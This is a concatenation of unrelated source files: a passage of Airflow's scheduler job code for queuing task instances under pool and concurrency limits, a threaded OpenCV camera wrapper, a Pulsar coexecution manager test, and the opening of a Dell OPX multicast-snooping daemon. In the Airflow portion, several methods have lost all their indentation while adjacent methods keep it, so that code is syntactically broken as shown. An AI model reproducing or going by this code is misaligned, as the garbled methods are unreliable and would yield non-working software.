            .filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
            .filter(models.TaskInstance.state.in_(old_states)) \
            .filter(or_(
                # pylint: disable=comparison-with-callable
                models.DagRun.state != State.RUNNING,
                models.DagRun.state.is_(None)))  # pylint: disable=no-member

        # We need to do this for mysql as well because it can cause deadlocks
        # as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
        if self.using_sqlite or self.using_mysql:
            # Row-by-row update under SELECT ... FOR UPDATE.
            tis_to_change: List[TI] = query.with_for_update().all()
            for ti in tis_to_change:
                ti.set_state(new_state, session=session)
                tis_changed += 1
        else:
            # Other backends: one bulk UPDATE keyed off a subquery of the
            # matching (dag_id, task_id, execution_date) rows.
            subq = query.subquery()
            tis_changed = session \
                .query(models.TaskInstance) \
                .filter(
                    models.TaskInstance.dag_id == subq.c.dag_id,
                    models.TaskInstance.task_id == subq.c.task_id,
                    models.TaskInstance.execution_date ==
                    subq.c.execution_date) \
                .update({models.TaskInstance.state: new_state}, synchronize_session=False)
            session.commit()

        if tis_changed > 0:
            self.log.warning(
                "Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
                tis_changed, new_state
            )
        Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(
self, states: List[str], session: Session = None
) -> Tuple[DefaultDict[str, int], DefaultDict[Tuple[str, str], int]]:
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
ti_concurrency_query: List[Tuple[str, str, int]] = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map: DefaultDict[str, int] = defaultdict(int)
task_map: DefaultDict[Tuple[str, str], int] = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
    # pylint: disable=too-many-locals,too-many-statements
    @provide_session
    def _find_executable_task_instances(
        self,
        simple_dag_bag: SimpleDagBag,
        session: Session = None
    ) -> List[TI]:
        """
        Finds TIs that are ready for execution with respect to pool limits,
        dag concurrency, executor state, and priority.

        :param simple_dag_bag: TaskInstances associated with DAGs in the
            simple_dag_bag will be fetched from the DB and executed
        :type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
        :return: list[airflow.models.TaskInstance]
        """
        executable_tis: List[TI] = []

        # Get all task instances associated with scheduled
        # DagRuns which are not backfilled, in the given states,
        # and the dag is not paused
        task_instances_to_examine: List[TI] = (
            session
            .query(TI)
            .filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
            .outerjoin(
                DR, and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
            )
            .filter(or_(DR.run_id.is_(None), DR.run_type != DagRunType.BACKFILL_JOB.value))
            .outerjoin(DM, DM.dag_id == TI.dag_id)
            .filter(or_(DM.dag_id.is_(None), not_(DM.is_paused)))
            .filter(TI.state == State.SCHEDULED)
            .all()
        )
        Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))

        if len(task_instances_to_examine) == 0:
            self.log.debug("No tasks to consider for execution.")
            return executable_tis

        # Put one task instance on each line
        task_instance_str = "\n\t".join(
            [repr(x) for x in task_instances_to_examine])
        self.log.info(
            "%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
            task_instance_str
        )

        # Get the pool settings
        pools: Dict[str, models.Pool] = {p.pool: p for p in session.query(models.Pool).all()}

        # Group the candidate TIs by the pool they want to run in.
        pool_to_task_instances: DefaultDict[str, List[TI]] = defaultdict(list)
        for task_instance in task_instances_to_examine:
            pool_to_task_instances[task_instance.pool].append(task_instance)

        # dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
        dag_concurrency_map: DefaultDict[str, int]
        task_concurrency_map: DefaultDict[Tuple[str, str], int]
        dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
            states=list(EXECUTION_STATES), session=session)

        num_tasks_in_executor = 0
        # Number of tasks that cannot be scheduled because of no open slot in pool
        num_starving_tasks_total = 0

        # Go through each pool, and queue up a task for execution if there are
        # any open slots in the pool.
        # pylint: disable=too-many-nested-blocks
        for pool, task_instances in pool_to_task_instances.items():
            pool_name = pool
            if pool not in pools:
                self.log.warning(
                    "Tasks using non-existent pool '%s' will not be scheduled",
                    pool
                )
                continue

            open_slots = pools[pool].open_slots(session=session)

            num_ready = len(task_instances)
            self.log.info(
                "Figuring out tasks to run in Pool(name=%s) with %s open slots "
                "and %s task instances ready to be queued",
                pool, open_slots, num_ready
            )

            # Highest priority first; ties broken by earliest execution date.
            priority_sorted_task_instances = sorted(
                task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))

            num_starving_tasks = 0
            for current_index, task_instance in enumerate(priority_sorted_task_instances):
                if open_slots <= 0:
                    self.log.info(
                        "Not scheduling since there are %s open slots in pool %s",
                        open_slots, pool
                    )
                    # Can't schedule any more since there are no more open slots.
                    num_unhandled = len(priority_sorted_task_instances) - current_index
                    num_starving_tasks += num_unhandled
                    num_starving_tasks_total += num_unhandled
                    break

                # Check to make sure that the task concurrency of the DAG hasn't been
                # reached.
                dag_id = task_instance.dag_id
                serialized_dag = simple_dag_bag.get_dag(dag_id)

                current_dag_concurrency = dag_concurrency_map[dag_id]
                dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
                self.log.info(
                    "DAG %s has %s/%s running and queued tasks",
                    dag_id, current_dag_concurrency, dag_concurrency_limit
                )
                if current_dag_concurrency >= dag_concurrency_limit:
                    self.log.info(
                        "Not executing %s since the number of tasks running or queued "
                        "from DAG %s is >= to the DAG's task concurrency limit of %s",
                        task_instance, dag_id, dag_concurrency_limit
                    )
                    continue

                # Per-task concurrency cap, if one was declared on the operator.
                task_concurrency_limit: Optional[int] = None
                if serialized_dag.has_task(task_instance.task_id):
                    task_concurrency_limit = serialized_dag.get_task(
                        task_instance.task_id).task_concurrency

                if task_concurrency_limit is not None:
                    current_task_concurrency = task_concurrency_map[
                        (task_instance.dag_id, task_instance.task_id)
                    ]

                    if current_task_concurrency >= task_concurrency_limit:
                        self.log.info("Not executing %s since the task concurrency for"
                                      " this task has been reached.", task_instance)
                        continue

                # Skip anything the executor already thinks it is running.
                if self.executor.has_task(task_instance):
                    self.log.debug(
                        "Not handling task %s as the executor reports it is running",
                        task_instance.key
                    )
                    num_tasks_in_executor += 1
                    continue

                if task_instance.pool_slots > open_slots:
                    self.log.info("Not executing %s since it requires %s slots "
                                  "but there are %s open slots in the pool %s.",
                                  task_instance, task_instance.pool_slots, open_slots, pool)
                    num_starving_tasks += 1
                    num_starving_tasks_total += 1
                    # Though we can execute tasks with lower priority if there's enough room
                    continue

                executable_tis.append(task_instance)
                # Account for the slots this TI will consume so later candidates
                # in the same scheduling pass see the updated totals.
                open_slots -= task_instance.pool_slots
                dag_concurrency_map[dag_id] += 1
                task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1

            Stats.gauge(f'pool.starving_tasks.{pool_name}', num_starving_tasks)

        Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
        Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
        Stats.gauge('scheduler.tasks.executable', len(executable_tis))

        task_instance_str = "\n\t".join(
            [repr(x) for x in executable_tis])
        self.log.info(
            "Setting the following tasks to queued state:\n\t%s", task_instance_str)

        # so these dont expire on commit
        for ti in executable_tis:
            copy_dag_id = ti.dag_id
            copy_execution_date = ti.execution_date
            copy_task_id = ti.task_id
            make_transient(ti)
            ti.dag_id = copy_dag_id
            ti.execution_date = copy_execution_date
            ti.task_id = copy_task_id
        return executable_tis
    @provide_session
    def _change_state_for_executable_task_instances(
        self, task_instances: List[TI], session: Session = None
    ) -> List[SimpleTaskInstance]:
        """
        Changes the state of task instances in the list with one of the given states
        to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.

        :param task_instances: TaskInstances to change the state of
        :type task_instances: list[airflow.models.TaskInstance]
        :rtype: list[airflow.models.taskinstance.SimpleTaskInstance]
        """
        if len(task_instances) == 0:
            session.commit()
            return []

        # Re-select the rows under row locks so only TIs still in SCHEDULED
        # (i.e. not grabbed by anything else meanwhile) get queued.
        tis_to_set_to_queued: List[TI] = (
            session
            .query(TI)
            .filter(TI.filter_for_tis(task_instances))
            .filter(TI.state == State.SCHEDULED)
            .with_for_update()
            .all()
        )

        if len(tis_to_set_to_queued) == 0:
            self.log.info("No tasks were able to have their state changed to queued.")
            session.commit()
            return []

        # set TIs to queued state
        filter_for_tis = TI.filter_for_tis(tis_to_set_to_queued)
        session.query(TI).filter(filter_for_tis).update(
            {TI.state: State.QUEUED, TI.queued_dttm: timezone.utcnow(), TI.queued_by_job_id: self.id},
            synchronize_session=False
        )
        session.commit()

        # Generate a list of SimpleTaskInstance for the use of queuing
        # them in the executor.
        simple_task_instances = [SimpleTaskInstance(ti) for ti in tis_to_set_to_queued]

        task_instance_str = "\n\t".join([repr(x) for x in tis_to_set_to_queued])
        self.log.info("Setting the following %s tasks to queued state:\n\t%s",
                      len(tis_to_set_to_queued), task_instance_str)
        return simple_task_instances
def _enqueue_task_instances_with_queued_state(
self,
simple_dag_bag: SimpleDagBag,
simple_task_instances: List[SimpleTaskInstance]
) -> None:
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contains all of the task_instances' dags
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
# actually enqueue them
for simple_task_instance in simple_task_instances:
serialized_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=serialized_dag.full_filepath,
pickle_id=serialized_dag.pickle_id,
)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue,
)
@provide_session
def _execute_task_instances(
self,
simple_dag_bag: SimpleDagBag,
session: Session = None
) -> int:
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:return: Number of task instance with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, session=session)
def query(result: int, items: List[TI]) -> int:
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items, session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
    @provide_session
    def _change_state_for_tasks_failed_to_execute(self, session: Session = None):
        """
        If there are tasks left over in the executor,
        we set them back to SCHEDULED to avoid creating hanging tasks.

        :param session: session for ORM operations
        """
        if not self.executor.queued_tasks:
            return

        # One AND-clause per task still sitting in the executor's queue.
        filter_for_ti_state_change = (
            [and_(
                TI.dag_id == dag_id,
                TI.task_id == task_id,
                TI.execution_date == execution_date,
                # The TI.try_number will return raw try_number+1 since the
                # ti is not running. And we need to -1 to match the DB record.
                TI._try_number == try_number - 1,  # pylint: disable=protected-access
                TI.state == State.QUEUED)
                for dag_id, task_id, execution_date, try_number
                in self.executor.queued_tasks.keys()])
        ti_query = session.query(TI).filter(or_(*filter_for_ti_state_change))
        # Lock the rows so no other scheduler/worker flips them concurrently.
        tis_to_set_to_scheduled: List[TI] = ti_query.with_for_update().all()
        if not tis_to_set_to_scheduled:
            return

        # set TIs back to scheduled state and clear their queued timestamp
        filter_for_tis = TI.filter_for_tis(tis_to_set_to_scheduled)
        session.query(TI).filter(filter_for_tis).update(
            {TI.state: State.SCHEDULED, TI.queued_dttm: None}, synchronize_session=False
        )

        # Drop them from the executor queue so they can be re-picked later.
        for task_instance in tis_to_set_to_scheduled:
            self.executor.queued_tasks.pop(task_instance.key)

        task_instance_str = "\n\t".join(repr(x) for x in tis_to_set_to_scheduled)
        self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
    @provide_session
    def _process_executor_events(self, simple_dag_bag: SimpleDagBag, session: Session = None) -> None:
        """
        Respond to executor events: record external executor ids for newly
        QUEUED tasks, and detect tasks the executor reports finished while the
        DB still shows them as QUEUED (likely killed externally), triggering
        their failure callback.
        """
        if not self.processor_agent:
            raise ValueError("Processor agent is not started.")
        ti_primary_key_to_try_number_map: Dict[Tuple[str, str, datetime.datetime], int] = {}
        event_buffer = self.executor.get_event_buffer(simple_dag_bag.dag_ids)
        tis_with_right_state: List[TaskInstanceKey] = []

        # Report execution
        for ti_key, value in event_buffer.items():
            state: str
            state, _ = value
            # We create map (dag_id, task_id, execution_date) -> in-memory try_number
            ti_primary_key_to_try_number_map[ti_key.primary] = ti_key.try_number

            self.log.info(
                "Executor reports execution of %s.%s execution_date=%s "
                "exited with status %s for try_number %s",
                ti_key.dag_id, ti_key.task_id, ti_key.execution_date, state, ti_key.try_number
            )
            if state in (State.FAILED, State.SUCCESS, State.QUEUED):
                tis_with_right_state.append(ti_key)

        # Return if no finished tasks
        if not tis_with_right_state:
            return

        # Check state of finished tasks
        filter_for_tis = TI.filter_for_tis(tis_with_right_state)
        tis: List[TI] = session.query(TI).filter(filter_for_tis).all()
        for ti in tis:
            try_number = ti_primary_key_to_try_number_map[ti.key.primary]
            buffer_key = ti.key.with_try_number(try_number)
            state, info = event_buffer.pop(buffer_key)

            # TODO: should we fail RUNNING as well, as we do in Backfills?
            if state == State.QUEUED:
                # Executor accepted the task; remember its external id.
                ti.external_executor_id = info
                self.log.info("Setting external_id for %s to %s", ti, info)
                continue

            if ti.try_number == buffer_key.try_number and ti.state == State.QUEUED:
                # Executor says finished but the DB never saw it run.
                Stats.incr('scheduler.tasks.killed_externally')
                msg = "Executor reports task instance %s finished (%s) although the " \
                    "task says its %s. (Info: %s) Was the task killed externally?"
                self.log.error(msg, ti, state, ti.state, info)

                # Ask the DAG-file processor to run the task's failure callback.
                serialized_dag = simple_dag_bag.get_dag(ti.dag_id)
                self.processor_agent.send_callback_to_execute(
                    full_filepath=serialized_dag.full_filepath,
                    task_instance=ti,
                    msg=msg % (ti, state, ti.state, info),
                )
    def _execute(self) -> None:
        """Run the scheduler: start the executor and the DAG-file processor
        agent, run the scheduling loop, then shut everything down."""
        self.log.info("Starting the scheduler")

        # DAGs can be pickled for easier remote execution by some executors
        pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS

        self.log.info("Processing each file at most %s times", self.num_runs)

        # When using sqlite, we do not use async_mode
        # so the scheduler job and DAG parser don't access the DB at the same time.
        async_mode = not self.using_sqlite

        processor_timeout_seconds: int = conf.getint('core', 'dag_file_processor_timeout')
        processor_timeout = timedelta(seconds=processor_timeout_seconds)
        self.processor_agent = DagFileProcessorAgent(
            dag_directory=self.subdir,
            max_runs=self.num_runs,
            processor_factory=type(self)._create_dag_file_processor,
            processor_timeout=processor_timeout,
            dag_ids=self.dag_ids,
            pickle_dags=pickle_dags,
            async_mode=async_mode,
        )

        try:
            self.executor.job_id = self.id
            self.executor.start()

            self.log.info("Resetting orphaned tasks for active dag runs")
            self.adopt_or_reset_orphaned_tasks()

            self.register_exit_signals()

            # Start after resetting orphaned tasks to avoid stressing out DB.
            self.processor_agent.start()

            execute_start_time = timezone.utcnow()

            self._run_scheduler_loop()

            # Stop any processors
            self.processor_agent.terminate()

            # Verify that all files were processed, and if so, deactivate DAGs that
            # haven't been touched by the scheduler as they likely have been
            # deleted.
            if self.processor_agent.all_files_processed:
                self.log.info(
                    "Deactivating DAGs that haven't been touched since %s",
                    execute_start_time.isoformat()
                )
                models.DAG.deactivate_stale_dags(execute_start_time)

            self.executor.end()

            settings.Session.remove()  # type: ignore
        except Exception:  # pylint: disable=broad-except
            self.log.exception("Exception when executing SchedulerJob._run_scheduler_loop")
        finally:
            # Always stop the processor agent, even on error, to avoid orphans.
            self.processor_agent.end()
            self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(
file_path: str,
failure_callback_requests: List[FailureCallbackRequest],
dag_ids: Optional[List[str]],
pickle_dags: bool
) -> DagFileProcessorProcess:
"""
Creates DagFileProcessorProcess instance.
"""
return DagFileProcessorProcess(
file_path=file_path,
pickle_dags=pickle_dags,
dag_ids=dag_ids,
failure_callback_requests=failure_callback_requests
)
    def _run_scheduler_loop(self) -> None:
        """
        The actual scheduler loop. The main steps in the loop are:
        #. Harvest DAG parsing results through DagFileProcessorAgent
        #. Find and queue executable tasks
        #. Change task instance state in DB
        #. Queue tasks in executor
        #. Heartbeat executor
        #. Execute queued tasks in executor asynchronously
        #. Sync on the states of running tasks

        Following is a graphic representation of these steps.

        .. image:: ../docs/img/scheduler_loop.jpg

        :rtype: None
        """
        if not self.processor_agent:
            raise ValueError("Processor agent is not started.")
        is_unit_test: bool = conf.getboolean('core', 'unit_test_mode')

        # For the execute duration, parse and schedule DAGs
        while True:
            loop_start_time = time.time()

            if self.using_sqlite:
                self.processor_agent.run_single_parsing_loop()
                # For the sqlite case w/ 1 thread, wait until the processor
                # is finished to avoid concurrent access to the DB.
                self.log.debug("Waiting for processors to finish since we're using sqlite")
                self.processor_agent.wait_until_finished()

            # Pull the DAGs the parser has produced since the last iteration.
            serialized_dags = self.processor_agent.harvest_serialized_dags()

            self.log.debug("Harvested %d SimpleDAGs", len(serialized_dags))

            # Send tasks for execution if available
            simple_dag_bag = SimpleDagBag(serialized_dags)

            # On failure, restart the loop without heartbeating the executor.
            if not self._validate_and_run_task_instances(simple_dag_bag=simple_dag_bag):
                continue

            # Heartbeat the scheduler periodically
            self.heartbeat(only_if_necessary=True)

            self._emit_pool_metrics()

            loop_end_time = time.time()
            loop_duration = loop_end_time - loop_start_time
            self.log.debug("Ran scheduling loop in %.2f seconds", loop_duration)

            if not is_unit_test:
                time.sleep(self._processor_poll_interval)

            if self.processor_agent.done:
                self.log.info(
                    "Exiting scheduler loop as all files have been processed %d times", self.num_runs
                )
                break
def _validate_and_run_task_instances(self, simple_dag_bag: SimpleDagBag) -> bool:
if simple_dag_bag.serialized_dags:
try:
self._process_and_execute_tasks(simple_dag_bag)
except Exception as e: # pylint: disable=broad-except
self.log.error("Error queuing tasks")
self.log.exception(e)
return False
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
return True
def _process_and_execute_tasks(self, simple_dag_bag: SimpleDagBag) -> None:
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(
simple_dag_bag=simple_dag_bag,
old_states=[State.UP_FOR_RETRY],
new_state=State.FAILED
)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(
simple_dag_bag=simple_dag_bag,
old_states=[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE,
State.SENSING],
new_state=State.NONE
)
self._execute_task_instances(simple_dag_bag)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED])
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING])
    @provide_session
    def heartbeat_callback(self, session: Session = None) -> None:
        """Emit the scheduler heartbeat metric; invoked on each BaseJob heartbeat."""
        Stats.incr('scheduler_heartbeat', 1, 1)
    @provide_session
    def adopt_or_reset_orphaned_tasks(self, session: Session = None):
        """
        Reset any TaskInstance still in QUEUED or SCHEDULED states that were
        enqueued by a SchedulerJob that is no longer running.

        :return: the number of TIs reset
        :rtype: int
        """
        timeout = conf.getint('scheduler', 'scheduler_health_check_threshold')

        # First, mark any scheduler job without a recent heartbeat as FAILED.
        num_failed = session.query(SchedulerJob).filter(
            SchedulerJob.state == State.RUNNING,
            SchedulerJob.latest_heartbeat < (timezone.utcnow() - timedelta(seconds=timeout))
        ).update({"state": State.FAILED})

        if num_failed:
            self.log.info("Marked %d SchedulerJob instances as failed", num_failed)
            Stats.incr(self.__class__.__name__.lower() + '_end', num_failed)

        resettable_states = [State.SCHEDULED, State.QUEUED, State.RUNNING]
        tis_to_reset_or_adopt = (
            session.query(TI).filter(TI.state.in_(resettable_states))
            # outerjoin is because we didn't use to have queued_by_job
            # set, so we need to pick up anything pre upgrade. This (and the
            # "or queued_by_job_id IS NONE") can go as soon as scheduler HA is
            # released.
            .outerjoin(TI.queued_by_job)
            .filter(or_(TI.queued_by_job_id.is_(None), SchedulerJob.state != State.RUNNING))
            .join(TI.dag_run)
            .filter(DagRun.run_type != DagRunType.BACKFILL_JOB.value,
                    # pylint: disable=comparison-with-callable
                    DagRun.state == State.RUNNING)
            .options(load_only(TI.dag_id, TI.task_id, TI.execution_date))
            # Lock these rows, so that another scheduler can't try and adopt these too
            .with_for_update(of=TI, **skip_locked(session=session))
            .all()
        )

        # Let the executor adopt what it can; whatever it hands back is reset.
        to_reset = self.executor.try_adopt_task_instances(tis_to_reset_or_adopt)

        reset_tis_message = []
        for ti in to_reset:
            reset_tis_message.append(repr(ti))
            ti.state = State.NONE
            ti.queued_by_job_id = None

        # Successfully adopted TIs get re-stamped with this scheduler's job id.
        for ti in set(tis_to_reset_or_adopt) - set(to_reset):
            ti.queued_by_job_id = self.id

        Stats.incr('scheduler.orphaned_tasks.cleared', len(to_reset))
        Stats.incr('scheduler.orphaned_tasks.adopted', len(tis_to_reset_or_adopt) - len(to_reset))

        if to_reset:
            task_instance_str = '\n\t'.join(reset_tis_message)
            self.log.info("Reset the following %s orphaned TaskInstances:\n\t%s",
                          len(to_reset), task_instance_str)

        return len(to_reset)
|
videoCapture.py | from threading import Thread
import cv2
class VideoCapture():
    """Video capturing with opencv and threads.

    Frames are grabbed continuously on a daemon thread so read() always
    returns the most recent frame without blocking on the camera.
    """

    def __init__(self, src=0, name="WebcamVideoStream", resolution=(800, 600)):
        # initialize the video camera stream and read the first frame
        # from the stream
        self.stream = cv2.VideoCapture(src)
        # property ids 3/4 are CAP_PROP_FRAME_WIDTH / CAP_PROP_FRAME_HEIGHT
        self.stream.set(3, resolution[0])
        self.stream.set(4, resolution[1])
        (self.grabbed, self.frame) = self.stream.read()
        # initialize the thread name
        self.name = name
        # initialize the variable used to indicate if the thread should
        # be stopped
        self.stopped = False
        # BUGFIX: keep a handle on the reader thread so release() can join it
        self._thread = None

    def start(self):
        # start the thread to read frames from the video stream
        t = Thread(target=self.update, name=self.name, args=())
        t.daemon = True
        self._thread = t
        t.start()
        return self

    def update(self):
        # keep looping infinitely until the thread is stopped
        while not self.stopped:
            # read the next frame from the stream
            (self.grabbed, self.frame) = self.stream.read()
        # BUGFIX: release the underlying camera once the loop exits so the
        # device handle is not leaked when the stream is stopped.
        self.stream.release()

    def read(self):
        # return the frame most recently read; the leading 1 mimics the
        # "ret" flag of cv2.VideoCapture.read() for drop-in compatibility
        return (1, self.frame)

    def release(self):
        # indicate that the thread should be stopped
        self.stopped = True
        if self._thread is not None:
            # wait briefly for the reader to exit (it releases the camera)
            self._thread.join(timeout=1.0)
        else:
            # never started: release the camera directly
            self.stream.release()

    def isOpened(self):
        # mirrors cv2.VideoCapture.isOpened() naming for drop-in use
        return not self.stopped
|
manager_coexecution_test.py | import subprocess
import threading
from .test_utils import (
BaseManagerTestCase,
)
from pulsar.managers.unqueued import CoexecutionManager
class Coexecutor(object):
    """Mimic shell script in other container of coexecutor pod-like environment."""

    def __init__(self, manager):
        # manager: CoexecutionManager that stages the command line for job "123"
        self.manager = manager
        # Set True once a command line was read, or externally to abort the loop.
        self.has_command_line = False
        self.command_line = None

    def monitor(self):
        # Busy-poll the manager until a complete command line for job "123"
        # shows up, then execute it through the shell.
        while not self.has_command_line:
            try:
                command_line = self.manager.read_command_line("123")
            except (IOError, ValueError):
                # command file may not exist yet / be mid-write - keep polling
                continue
            if not command_line:
                # might be partially written... need to be make this atomic I think.
                continue
            self.command_line = command_line
            self.has_command_line = True
        # NOTE(review): if the loop is aborted externally (has_command_line set
        # from another thread) before any read succeeded, the local
        # 'command_line' is unbound here - confirm intended.
        subprocess.call(command_line, shell=True)
        # we are ignoring this exit code and just trusting the one in the job script...
        # I'm not sure what to do about that.
class CoexecutionManagerTest(BaseManagerTestCase):
    """Run a CoexecutionManager while a background thread mimics the
    companion container that executes the staged command line."""

    def setUp(self):
        super(CoexecutionManagerTest, self).setUp()
        self._set_manager()

    def tearDown(self):
        # BUGFIX: this previously called super().setUp(), which re-ran test
        # setup (allocating fresh state) instead of tearing the fixture down.
        super(CoexecutionManagerTest, self).tearDown()

    def _set_manager(self, **kwds):
        self.manager = CoexecutionManager('_default_', self.app, **kwds)

    def test_simple_execution(self):
        coexecutor = Coexecutor(self.manager)
        t = threading.Thread(target=coexecutor.monitor)
        t.start()
        try:
            self._test_simple_execution(self.manager, timeout=5)
        finally:
            # Unblock the monitor loop even on failure, then reap the thread.
            coexecutor.has_command_line = True
            t.join(2)
|
base_mcast_snoop.py | #!/usr/bin/python
# Copyright (c) 2019 Dell Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# THIS CODE IS PROVIDED ON AN *AS IS* BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT
# LIMITATION ANY IMPLIED WARRANTIES OR CONDITIONS OF TITLE, FITNESS
# FOR A PARTICULAR PURPOSE, MERCHANTABLITY OR NON-INFRINGEMENT.
#
# See the Apache Version 2.0 License for specific language governing
# permissions and limitations under the License.
import signal
import cps
import cps_utils
import cps_object
import systemd.daemon
import dn_base_mcast_snoop_utils as mcast_utils
import dn_base_mcast_snoop as mcast_snoop
import time
import event_log as ev
import logging
import os as mcast_os
import threading
# Common prefix of the observed (state) object paths for snooping protocols.
key_prefix = 'igmp-mld-snooping/rt/routing-state/control-plane-protocols/'
# Maps each snooping protocol to the IP family it serves.
ip_types = {'igmp-snooping': 'ipv4', 'mld-snooping': 'ipv6'}
# Per-protocol state paths -> (CPS observed key, ip family) used by get_cb.
snoop_state_keys = {key_prefix + x + '/' + 'vlans/vlan': (
    cps.key_from_name('observed', key_prefix + x + '/' + 'vlans/vlan'), ip_types[x]) \
    for x in ip_types}
# All CPS keys (config targets + observed state) this daemon registers for.
_igmp_keys = {
    "igmp-mld-snooping/rt/routing/control-plane-protocols/igmp-snooping/global":
        cps.key_from_name("target", "igmp-mld-snooping/rt/routing/control-plane-protocols/igmp-snooping/global"),
    "igmp-mld-snooping/rt/routing/control-plane-protocols/mld-snooping/global":
        cps.key_from_name("target", "igmp-mld-snooping/rt/routing/control-plane-protocols/mld-snooping/global"),
    "igmp-mld-snooping/rt/routing/control-plane-protocols/igmp-snooping/vlans/vlan":
        cps.key_from_name("target", "igmp-mld-snooping/rt/routing/control-plane-protocols/igmp-snooping/vlans/vlan"),
    "igmp-mld-snooping/rt/routing/control-plane-protocols/mld-snooping/vlans/vlan":
        cps.key_from_name("target", "igmp-mld-snooping/rt/routing/control-plane-protocols/mld-snooping/vlans/vlan"),
    "igmp-mld-snooping/rt/routing-state/control-plane-protocols/igmp-snooping/vlans/vlan":
        cps.key_from_name("observed", "igmp-mld-snooping/rt/routing-state/control-plane-protocols/igmp-snooping/vlans/vlan"),
    "igmp-mld-snooping/rt/routing-state/control-plane-protocols/igmp-snooping/vlans":
        cps.key_from_name("observed", "igmp-mld-snooping/rt/routing-state/control-plane-protocols/igmp-snooping/vlans")
}
# Fold the observed state keys into the registration map as well.
_igmp_keys.update({x: snoop_state_keys[x][0] for x in snoop_state_keys})
# Presence of this file means an external snooping application is running,
# so the kernel must NOT be programmed by this daemon.
snoop_cfg_file = '/etc/opx/base_no_mcast_snooping'
kernel_snooping_needed = True
def _is_ip_link_snoop_cmd_supported():
#For now, all snoop updates are based on file
return False
def get_cb(methods, params):
    """CPS get callback: append per-VLAN snooping state to the response list.

    Matches the request key against the observed snoop keys, extracts an
    optional vlan-id filter from the request object and delegates to
    mcast_utils.get_igmp_snooping().  Returns False on any failure.
    """
    iplink_get_state = _is_ip_link_snoop_cmd_supported()
    obj = cps_object.CPSObject(obj = params['filter'])
    resp = params['list']
    ret_val = False
    for key_str, (key, ip_type) in snoop_state_keys.items():
        if obj.get_key() == key:
            try:
                vlan_id = obj.get_attr_data('vlan-id')
            except ValueError:
                # No vlan-id filter supplied: report state for all VLANs.
                vlan_id = None
            try:
                ret_val = mcast_utils.get_igmp_snooping(resp, key_str, ip_type,
                    iplink_get_state, vlan_id)
            except Exception as ex:
                return False
            break
    return ret_val
